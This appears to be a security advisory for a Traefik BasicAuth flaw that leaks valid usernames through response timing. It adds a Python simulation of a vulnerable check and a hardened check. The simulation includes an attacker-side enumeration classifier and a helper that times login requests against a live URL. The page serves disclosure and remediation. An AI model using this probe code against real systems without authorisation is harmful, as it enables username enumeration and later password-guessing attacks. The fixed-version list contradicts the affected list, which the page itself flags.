PT-2026-26602 · Traefik · Traefik
F1Vet · Published 2026-03-20 · Updated 2026-03-27 · CVE-2026-32595
CVSS v4.0: 6.3 (Medium)
| Vector | AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N |
Name of the Vulnerable Software and Affected Versions
Traefik versions 2.11.40 and below
Traefik versions 3.0.0-beta1 through 3.6.11
Traefik version 3.7.0-ea.1
Description
Traefik's BasicAuth middleware leaks whether a submitted username exists through response timing. When the username matches an entry in the configured user list, the middleware runs a bcrypt comparison of the submitted password against the stored hash, which takes roughly 166 milliseconds; when the username is unknown, the request is rejected immediately, in roughly 0.6 milliseconds, without any hash computation. A gap of that size (the advisory cites a factor of about 298) survives ordinary network jitter, so an unauthenticated attacker can reliably separate valid from invalid usernames with a handful of requests per candidate. No credentials are needed (PR:N) and no password is disclosed; the impact is username enumeration, which narrows subsequent credential-stuffing or password-guessing attacks against the services the middleware protects.
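To make the mechanism concrete, the following added example (written for this page, not Traefik's code) simulates both behaviours side by side: a check that returns early for unknown users, as the advisory describes, and a hardened check that always performs exactly one slow verification. It assumes hashlib.pbkdf2_hmac with a fixed iteration count as a stand-in for bcrypt, a constructed in-memory USERS table in place of a Traefik users/usersFile entry, and a hypothetical probe_http helper for repeating the measurement against a live endpoint you are authorised to test. The enumerate_users classifier is the attacker's side of the story: it only labels candidates when a large timing gap exists, so it finds "alice" against the vulnerable check and nothing against the hardened one.

```python
# Added example: simulation of the BasicAuth username-enumeration timing channel.
import base64
import hashlib
import hmac
import os
import statistics
import time
import urllib.error
import urllib.request

ITERATIONS = 60_000  # assumption: tuned so one verification costs tens of ms, like bcrypt
SALT_LEN = 16
hash_calls = 0       # instrumentation: counts slow hash computations


def make_hash(password: str) -> bytes:
    """Store salt || derived key, the way a bcrypt string carries its own salt."""
    salt = os.urandom(SALT_LEN)
    return salt + hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)


def verify(password: str, stored: bytes) -> bool:
    """The deliberately slow comparison; every call costs the same."""
    global hash_calls
    hash_calls += 1
    salt, key = stored[:SALT_LEN], stored[SALT_LEN:]
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return hmac.compare_digest(candidate, key)


USERS = {"alice": make_hash("correct horse battery staple")}  # constructed user list
DUMMY_HASH = make_hash("not-a-real-password")                # used only by the hardened path


def vulnerable_check(username: str, password: str) -> bool:
    """Pattern the advisory describes: unknown user -> immediate reject, no hashing."""
    stored = USERS.get(username)
    if stored is None:
        return False
    return verify(password, stored)


def hardened_check(username: str, password: str) -> bool:
    """Always run exactly one slow verification so known and unknown users cost the
    same; the dummy result is discarded, so an unknown user can never authenticate."""
    stored = USERS.get(username)
    known = stored is not None
    ok = verify(password, stored if known else DUMMY_HASH)
    return ok and known


def count_hash_calls(check, username: str) -> int:
    """How many slow hashes one failed login attempt for `username` triggers."""
    global hash_calls
    hash_calls = 0
    check(username, "wrong-password")
    return hash_calls


def median_ms(check, username: str, samples: int = 5) -> float:
    """Median wall-clock cost (ms) of a wrong-password attempt for `username`."""
    times = []
    for _ in range(samples):
        t0 = time.perf_counter()
        check(username, "wrong-password")
        times.append((time.perf_counter() - t0) * 1000)
    return statistics.median(times)


def enumerate_users(check, candidates, min_gap: float = 10.0) -> set:
    """Attacker's classifier: if the slowest candidate is at least `min_gap` times
    slower than the fastest, everything above the geometric midpoint is a valid user.
    Returns an empty set when no such gap exists (the hardened behaviour)."""
    timings = {u: median_ms(check, u) for u in candidates}
    fastest, slowest = min(timings.values()), max(timings.values())
    if fastest <= 0 or slowest / fastest < min_gap:
        return set()
    threshold = (fastest * slowest) ** 0.5
    return {u for u, t in timings.items() if t > threshold}


def probe_http(url: str, username: str, samples: int = 5) -> float:
    """Hypothetical network helper: the same measurement against a live BasicAuth URL
    (median round-trip in ms for a wrong-password attempt). Not exercised offline."""
    token = base64.b64encode(f"{username}:wrong-password".encode()).decode()
    times = []
    for _ in range(samples):
        req = urllib.request.Request(url, headers={"Authorization": "Basic " + token})
        t0 = time.perf_counter()
        try:
            urllib.request.urlopen(req, timeout=5).close()
        except urllib.error.HTTPError:
            pass  # 401 is the expected response for a failed login
        times.append((time.perf_counter() - t0) * 1000)
    return statistics.median(times)


if __name__ == "__main__":
    candidates = ["root", "alice", "admin", "bob"]
    for name, check in (("vulnerable", vulnerable_check), ("hardened", hardened_check)):
        print(name, {u: round(median_ms(check, u), 3) for u in candidates},
              "-> enumerated:", enumerate_users(check, candidates))
```

The hardened variant is the standard fix for this class of bug: compute the expensive hash on every request, whether or not the user exists, and combine the result with the existence check afterwards. Rate limiting in front of the middleware only slows the attacker down; it does not close the channel, because the per-request difference remains measurable.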
Recommendations
Update to Traefik version 2.11.41 or later.
Update to Traefik version 3.6.11 or later (note: the affected-version list above names 3.6.11 as still vulnerable, so confirm the first fixed 3.6.x release against the upstream Traefik advisory before relying on it).
Update to Traefik version 3.7.0-ea.2 or later.
Rate limiting or IP blocking in front of the middleware only raises the cost of enumeration; it does not remove the timing difference, so upgrading is the actual fix.
Affected products
Traefik